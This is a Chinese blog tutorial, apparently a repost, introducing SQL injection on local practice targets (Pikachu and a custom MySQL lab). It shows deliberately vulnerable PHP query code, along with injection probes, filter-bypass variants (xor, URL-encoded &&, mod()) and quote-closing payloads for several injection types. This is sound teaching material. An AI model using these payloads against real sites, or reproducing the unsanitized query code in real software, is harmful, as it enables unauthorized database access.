OWASP top10--SQL注入(一)

news2024/11/25 7:53:04

       SQL注入式攻击技术,一般针对基于Web平台的应用程序.造成SQL注入攻击漏洞的原因,是由于程序员在编写Web程序时,没有对浏览器端提交的参数进行严格的过滤和判断。用户可以修改构造参数,提交SQL查询语句,并传递至服务器端,从而获取想要的敏感信息,甚至执行危险的代码或系统命令。

      虽然SQL注入攻击技术早已出现,但是时至今日仍然有很大一部分网站存在SQL注入漏洞,各大门户网站同样存在SQL注入漏洞。由于SQL漏润存在的普遍性,因此SQL入侵攻击技术往往成为黑客入侵攻击网站渗透内部服务的首选技术,其危害性非常大。


01:SQL注入漏洞概念/原理

  1. 由于程序员在编写Web程序时,没有对浏览器端提交的参数进行严格的过滤和判断  
  2. 注入产生的原因是接受相关参数未经处理直接带入数据库查询操作;注入攻击属于服务端攻击,他与操作系统、数据库类型、脚本语言类型无关 。

环境准备:win2003  phpstudy2016  mysql靶场环境、pikachu靶场环境

打开 musql靶场环境:

查看源代码:(sql.php)

<?
$id=$_GET['id'];//接受get方式传递参数名id的值并赋值给变量id

{
     $conn=mysql_connect("127.0.0.1","root","root");
if($conn){
      echo "ok!";
}//判断连接是否成功
mysql_select_db('sql',$conn);//选择连接请求为conn的数据库
$sql="select * from user where id=$id";
$result=mysql_query($sql);
while($row = mysql_fetch_array($result)){ //数组遍历
      echo "用户ID: ".$row['id']."<br >";
      echo "用户名: ".$row['username']."<br >";
      echo "用户密码: ".$row['password']."<br >";
      echo "用户邮箱: ".$row['email']."<br >";

}
mysql_close($conn);
echo "<hr>";
echo "你当前执行的sql语句为:";
echo "select * from user where id=$id";
}
?>

 说明:从GET请求中获取的参数id直接赋值给变量$id时,没有进行任何过滤或验证,产生SQL注入攻击漏洞。(参数id给变量$id未经过滤,直接带入数据库查询)

就可以在参数中编写SQL语句信息,最终需要将SQL语句发送到服务端(数据库服务)

02:SQL注入步骤


- 探测到SQL注入的注入点
- 需要绕过SQL注入防范机制
- 发送SQL注入SQL语句命令
- 获取数据库数据/篡改数据库数据 


03:SQL注入漏洞检测方法

单引号  

and

or  

Xor

%26%26

true  false

order by

单引号:

 mysql靶场:

http://10.0.0.101:90/mysql/sql.php?id=1

不加单引号能输出内容:

 加单引号不能输出内容:

打开phpstudy菜单mysql数据库命令行:

  查看数据库直接执行命令输出的内容:

 说明:主要判断是否与数据交互


and (和):

and 1=1和and 1=2

 mysql靶场

and 1=1输出数据库内容:

and 1=2 未输出数据库内容:

 查看数据库直接执行命令输出的内容:

and 1=1为真,数据库输出内容;and 1=2为假,数据库没有输出内容;

说明:防护机制未对and进行过滤,执行sql语句成功与数据库交互输出内容。


 or(或):

or 1=1   or 1=2 (or表示或)

or 1=1输出全部内容:(or表示或;1=1为真全部输出)

 or 1=2只输出查询内容:

 查看数据库直接执行命令输出的内容:


Xor(异或):

Xor 1=1   Xor 1=2( Xor表示异或)

(单引号、and、or被防护机制过滤了可尝试Xor进行绕过)

Xor 1=1输出di不是1的内容:

Xor1=2输出di为1的内容: 

 查看数据库直接执行命令输出的内容:

Xor说明:select * from test where A xor B

如果B为真,则查出不满足A条件数据;

如果B为假,则查出满足A条件数据;


%26%26(&&经url编码):

%26%26 1=1  %26%26 1=2

(因在URL中,&通常用于分隔多个参数;将&&通过URL编码绕过为%26%26)

%26%26 1=1

%26%26 1=2


true  false:

true为真  false为假

and true   and false

or true   or false

Xor true   Xor false

%26%26 true   %26%26 false

如果数字(1=1)被防护机制过滤可尝试此方式绕过;(true为真、false为假)

and true

and false 

 查看数据库直接执行命令输出的内容: 


mod(8,7)in(1)  mod(8,7)in(2)(求余函数)

使用求余函数mod;即mod(8,7)in(1)为真;mod(8,7)in(2)为假

and mod(8,7)in(1)   and mod(8,7)in(2)

or mod(8,7)in(1)   or mod(8,7)in(2)

Xor mod(8,7)in(1)   Xor mod(8,7)in(2)

%26%26 mod(8,7)in(1)   %26%26 mod(8,7)in(2)

and mod(8,7)in(1)为真;输出内容:

and mod(8,7)in(2)为假; 不输出内容:


order by(排序):

order by 4   order by 5 (探测有几列信息)

order by 4为真;user表有4个列输出内容:

 order by 5为假;user表有5个列不输出内容:

  查看数据库直接执行命令输出的内容:

 说明:

select * from user where id=1 order by 5 

这个SQL查询将从user表中选择所有id为1的记录,并按照第5个列进行排序。这里的数字5通常是指列的索引,从1开始计数。这意味着它会尝试按照表中第五个列的值进行排序。 如果user表中没有第五个列,或者5超出了列的数量,查询将会出错。


 04:哪些网页会有SQL注入漏洞

  • 与数据库交互的相关页面

    • http://www.*****.com/***.asp?id=xx (ASP注入)

    • http://www.*****.com/***.php?id=xx (php注入)

    • http://www.*****.com/***.jsp?id=xx (jsp注入)

有传参的地方

登录的地方

更新的地方

注册的地方

留言板

查询搜索

删除等。。

  • Http Header注入

    • 把http header直接代入数据库

  • Cookie注入

    • 数据参数写入到cookice参数里面

  • 可能出现注入的地方:http头、cookices、referee、user agent,post提交数据包的地方等等

 05:SQL注入分类

数字型

and 1=1  and 1=2

打开pikachu靶场环境,选择数字型注入:

http://10.0.0.101:90/pikachu/vul/sqli/sqli_id.php

点击查询--用bp抓包--发到bp重发器--插入sql注入语句测试: 

and 1=1

 and 1=2

 

存在sql注入点 


 搜索型

'%xx%' or 1=1

user' and 1=1 #    user' and 1=2 #

打开pikachu靶场环境:

http://10.0.0.101:90/pikachu/vul/sqli/sqli_str.php

查看源代码:

<?php
/**
 * Created by runner.han
 * There is nothing new under the sun
 */


$SELF_PAGE = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);

if ($SELF_PAGE = "sqli_str.php"){
    $ACTIVE = array('','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','active open','','','active','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','');
}

$PIKA_ROOT_DIR =  "../../";
include_once $PIKA_ROOT_DIR . 'header.php';

include_once $PIKA_ROOT_DIR."inc/config.inc.php";
include_once $PIKA_ROOT_DIR."inc/function.php";
include_once $PIKA_ROOT_DIR."inc/mysql.inc.php";

$link=connect();
$html='';

if(isset($_GET['submit']) && $_GET['name']!=null){
    //这里没有做任何处理,直接拼到select里面去了
    $name=$_GET['name'];
    //这里的变量是字符型,需要考虑闭合
    $query="select id,email from member where username='$name'";
    $result=execute($link, $query);
    if(mysqli_num_rows($result)>=1){
        while($data=mysqli_fetch_assoc($result)){
            $id=$data['id'];
            $email=$data['email'];
            $html.="<p class='notice'>your uid:{$id} <br />your email is: {$email}</p>";
        }
    }else{

        $html.="<p class='notice'>您输入的username不存在,请重新输入!</p>";
    }
}



?>

 其中: $query="select id,email from member where username='$name'";

'$name'变量是字符型有单引号,要绕过需要先加单引号进行闭合,原来的单引号进行注释:

如:user' and 1=2 #

$query="select id,email from member where username='user' and 1=2 #'";

通过添加 '来尝试关闭原本的字符串,然后添加and 1=2 一个始终为假,最后用#注释掉剩余的查询部分。

 user' and 1=1 # 为真;输出内容:

 

 user' and 1=2 # 为假,不输出内容:

 


搜索型

'%user%' or 1=1        '%user%' or 1=2

 打开pikachu靶场环境:

http://10.0.0.101:90/pikachu/vul/sqli/sqli_search.php

查看源代码:

<?php
/**
 * Created by runner.han
 * There is nothing new under the sun
 */


$SELF_PAGE = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);

if ($SELF_PAGE = "sqli_search.php"){
    $ACTIVE = array('','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','active open','','','','active','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','');
}

$PIKA_ROOT_DIR =  "../../";
include_once $PIKA_ROOT_DIR . 'header.php';

include_once $PIKA_ROOT_DIR."inc/config.inc.php";
include_once $PIKA_ROOT_DIR."inc/function.php";
include_once $PIKA_ROOT_DIR."inc/mysql.inc.php";

$link=connect();
$html1='';
$html2='';
if(isset($_GET['submit']) && $_GET['name']!=null){

    //这里没有做任何处理,直接拼到select里面去了
    $name=$_GET['name'];

    //这里的变量是模糊匹配,需要考虑闭合
    $query="select username,id,email from member where username like '%$name%'";
    $result=execute($link, $query);
    if(mysqli_num_rows($result)>=1){
        //彩蛋:这里还有个xss
        $html2.="<p class='notice'>用户名中含有{$_GET['name']}的结果如下:<br />";
        while($data=mysqli_fetch_assoc($result)){
            $uname=$data['username'];
            $id=$data['id'];
            $email=$data['email'];
            $html1.="<p class='notice'>username:{$uname}<br />uid:{$id} <br />email is: {$email}</p>";
        }
    }else{

        $html1.="<p class='notice'>0o。..没有搜索到你输入的信息!</p>";
    }
}



?>

其中$query="select username,id,email from member where username like '%$name%'";

'%$name%'会匹配任何包含 $name 的字符串,无论$name在用户名中的位置如何。

如果 $name = "user",查询会找到所有用户名中包含 "user" 的记录,如 "user123"、"superuser" 等。

如:user%' or  1=1 #

$query="select username,id,email from member where username like '%user%' or  1=1 #%'"

user%' or  1=1 # ;or或;1=1为真 ;输出所有含user的内容:

 

 user%' or  1=2 # ;or或;1=2为假 ;输出只含user的内容:

 


XX型(特殊类型)

username=('xx') or 1=1

user') or  1=1 #       user') or  1=2 # 

打开pikachu靶场环境:

http://10.0.0.101:90/pikachu/vul/sqli/sqli_x.php

查看源代码:

<?php
/**
 * Created by runner.han
 * There is nothing new under the sun
 */


$SELF_PAGE = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);

if ($SELF_PAGE = "sqli_search.php"){
    $ACTIVE = array('','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','active open','','','','','active','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','');
}

$PIKA_ROOT_DIR =  "../../";
include_once $PIKA_ROOT_DIR . 'header.php';

include_once $PIKA_ROOT_DIR."inc/config.inc.php";
include_once $PIKA_ROOT_DIR."inc/function.php";
include_once $PIKA_ROOT_DIR."inc/mysql.inc.php";

$link=connect();
$html='';

if(isset($_GET['submit']) && $_GET['name']!=null){
    //这里没有做任何处理,直接拼到select里面去了
    $name=$_GET['name'];
    //这里的变量是字符型,需要考虑闭合
    $query="select id,email from member where username=('$name')";
    $result=execute($link, $query);
    if(mysqli_num_rows($result)>=1){
        while($data=mysqli_fetch_assoc($result)){
            $id=$data['id'];
            $email=$data['email'];
            $html.="<p class='notice'>your uid:{$id} <br />your email is: {$email}</p>";
        }
    }else{

        $html.="<p class='notice'>您输入的username不存在,请重新输入!</p>";
    }
}



?>

 其中$query="select id,email from member where username=('$name')";

('$name')加了单引号和括号,进行绕过需要加单引号括号进行闭合。

如:user') or  1=1 #

$query="select id,email from member where username=('user') or  1=1 #')"

 

 user') or  1=1 # ;or或;1=1为真 ;输出所有含user的内容:

user') or  1=2 # ;or或;1=2为假 ;输出只含user的内容:

 


 

声明:

  • 此文章只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试留言私信,如有侵权请联系小编处理。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1694243.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【408精华知识】主存相关解题套路大揭秘!

讲完了Cache&#xff0c;再来讲讲主存是怎么考察的&#xff0c;我始终认为&#xff0c;一图胜千言&#xff0c;所以对于很多部件&#xff0c;我都是通过画图进行形象的记忆&#xff0c;那么接下来我们对主存也画个图&#xff0c;然后再来详细解读其考察套路~ 文章目录 零、主存…

Linux驱动学习之模块化,参数传递,符号导出

1.模块化 1.1.模块化的基本概念&#xff1a; 模块化是指将特定的功能或组件独立出来&#xff0c;以便于开发、测试和维护。在Linux设备驱动中&#xff0c;模块化允许将驱动程序作为内核模块动态加载到系统中&#xff0c;从而提高了系统的灵活性和可扩展性。 1.2.Linux内核模…

Kata Containers零基础学习从零到一

文章目录 docker和Kata Containers的区别Docker容器共享宿主机内核每个容器实例运行在轻量级虚拟机&#xff08;MicroVM&#xff09;总结 通俗例子Kata Containers架构实际Kata Containers架构图解容器技术栈总结 agent和shim家长&#xff08;shim进程&#xff09;的角色保姆&a…

OpenHarmony 实战开发——一文总结ACE代码框架

一、前言 ACE_Engine框架是OpenAtom OpenHarmony&#xff08;简称“OpenHarmony”&#xff09;的UI开发框架&#xff0c;为开发者提供在进行应用UI开发时所必需的各种组件&#xff0c;以及定义这些组件的属性、样式、事件及方法&#xff0c;通过这些组件可以方便进行OpenHarmo…

java基础-JVM日志、参数、内存结构、垃圾回收器

一、基础基础 1.1 数据类型 Java的数据类型分为原始数据类型和引用数据类型。 原始数据类型又分为数字型和布尔型。 数字型又有byte、short、int、long、char、float、double。注意&#xff0c;在这里char被定义为整数型&#xff0c;并且在规范中明确定义&#xff1a;byte、…

primeflex样式库笔记 Display相关的案例

回顾 宽度设置的基本总结 w-full&#xff1a;表示widtdh&#xff1a;100%&#xff1b;占满父容器的宽度。 w-screen&#xff1a;表示占满整个屏幕的宽度。 w-1到w-12&#xff0c;是按百分比划分宽度&#xff0c;数字越大&#xff0c;占据的比例就越大。 w-1rem到w-30rem&…

推特热帖:大语言模型自荐能够替代的20种人类工作!快来看你是否需要转行!

最近推特上有一个例子引起了广泛的讨论&#xff0c;事情的起因是这样的&#xff1a;网友让 GPT-4o 预测一下自己未来将会替代人类哪些工作&#xff1f; 这听起来很有趣&#xff01;GPT-4o会给出什么样的预测呢&#xff1f; 3.5研究测试&#xff1a;hujiaoai.cn 4研究测试&…

动物合并消除休闲游戏源码 Animal Merge 益智游戏

一款动物合并消除休闲游戏源码&#xff0c;Animal Merge是一款引人入胜的益智游戏&#xff0c;玩家的任务是合并方块&#xff0c;创造出可爱的动物&#xff0c;这些动物的体型会逐渐变大。游戏玩法包括将方块放到网格上&#xff0c;并战略性地将它们合并以形成更大的动物形状。…

数据库--数据库基础(一)

目录 第一章 绪论 一.数据库的基本概念 1. 数据库的4个基本概念 2、数据库系统的特点 二.数据库和文件 三.数据模型 1.概念模型 2.逻辑模型(物理模型) 2.1关系模型 四.数据库系统的三级模式结构&#xff1a; 五数据库的二级映像功能与数据独立性 第二章 关系数据库…

ffpmeg windows WSl 编译so

1.NDK 环境变量配置 2.git clone ffpmeg 3.创建脚本&#xff08;需先下载gcc编译器&#xff09; 64位脚本如下 #!/bin/bashexport NDK/home/test/ndk20 #这里配置先你的 NDK 路径 TOOLCHAIN$NDK/toolchains/llvm/prebuilt/linux-x86_64function build_android {./configure \ …

javas-core VS java-object-diff

对照工具选择 javas-core 和 java-object-diff ,对比demo https://github.com/kofgame/objectdiff-vs-javers&#xff0c;都为同源对比&#xff0c;都支持嵌套对象。 使用JMH测试方法进行性能测试&#xff0c;使用题库的QuestionResponseVO对象来进行对照对比&#xff0c;进行…

若依nodejs版本过高问题解决方案

由于nodejs版本过高,可能会导致vue-cli项目运行报错。 目录 方法1:每次启动项目前,输入配置命令 方法2:修改package.js

aws msk加密方式和问控制连接方式

msk加密方式 msk提供了两种加密方式 静态加密传输中加密 创建集群时可以指定加密方式&#xff0c;参数如下 aws kafka create-cluster --cluster-name "ExampleClusterName" --broker-node-group-info file://brokernodegroupinfo.json --encryption-info file:/…

结构体(位段)内存分配

结构体由多个数据类型的成员组成。那编译器分配的内存是不是所有成员的字节数总和呢&#xff1f; 首先&#xff0c;stu的内存大小并不为29个字节&#xff0c;即证明结构体内存不是所有成员的字节数和。   其次&#xff0c;stu成员中sex的内存位置不在21&#xff0c;即可推测…

【AI大模型】这可能是最简单的本地大模型工具,无须部署,一键使用

目录 前言 LM-Studio​编辑 那么问题来了&#xff0c;为什么我要在本地部署大模型&#xff1f; 隐私性&#xff1a; 定制性&#xff1a; 成本和体验的优化&#xff1a; 工具功能特点和使用方式介绍&#xff1a; 首页提供搜索功能和一些模型的推荐 模型下载管理&#x…

监控员工电脑屏幕的五大软件(电脑监控软件大盘点)

监控员工电脑屏幕是企业为了提升工作效率、确保信息安全和合规性而采取的一种常见做法。以下是五款在2024年备受推荐的员工电脑屏幕监控软件&#xff0c;每款软件都具有其独特的功能和优势&#xff1a; 1. 域智盾 域智盾是一款全面的终端管理系统&#xff0c;集成了实时屏幕监…

开源博客项目Blog .NET Core源码学习(26:App.Hosting项目结构分析-14)

后台管理页面的系统管理下主要包括用户管理、角色管理、按钮管理和菜单管理&#xff0c;其中创建用户时要指定角色&#xff0c;创建角色时需指定菜单权限&#xff0c;按钮管理也是基于各菜单项进行设置&#xff0c;只有菜单管理相对独立&#xff0c;因此本文学习并分析App.Host…

JAVA云HIS医院系统源码 HIS源码:云HIS系统与SaaS的关系

云HIS系统与SaaS的关系 云HIS系统是一种基于云计算技术的医院信息系统&#xff0c;它采用B/S架构&#xff0c;通过云端SaaS服务的方式提供。用户可以通过浏览器访问云HIS系统&#xff0c;无需关注系统的部署、维护、升级等问题。云HIS系统通常具有模板化、配置化、智能化等特点…

SpirngMVC框架学习笔记(一):SpringMVC基本介绍

1 SpringMVC 特点&概述 SpringMVC 从易用性&#xff0c;效率上 比曾经流行的 Struts2 更好 SpringMVC 是 WEB 层框架&#xff0c;接管了 Web 层组件, 比如控制器, 视图, 视图解析, 返回给用户的数据格式, 同时支持 MVC 的开发模式/开发架构SpringMVC 通过注解&#xff0c;…

sky walking日志采集以及注意事项

文章目录 1&#xff0c;sky walking日志采集功能概述2&#xff0c;采集log4j2日志3&#xff0c;采集logback日志4&#xff0c;效果展示5&#xff0c;注意事项 1&#xff0c;sky walking日志采集功能概述 在介绍Sky walking日志采集功能之前&#xff0c;最好在系统学习一遍日志…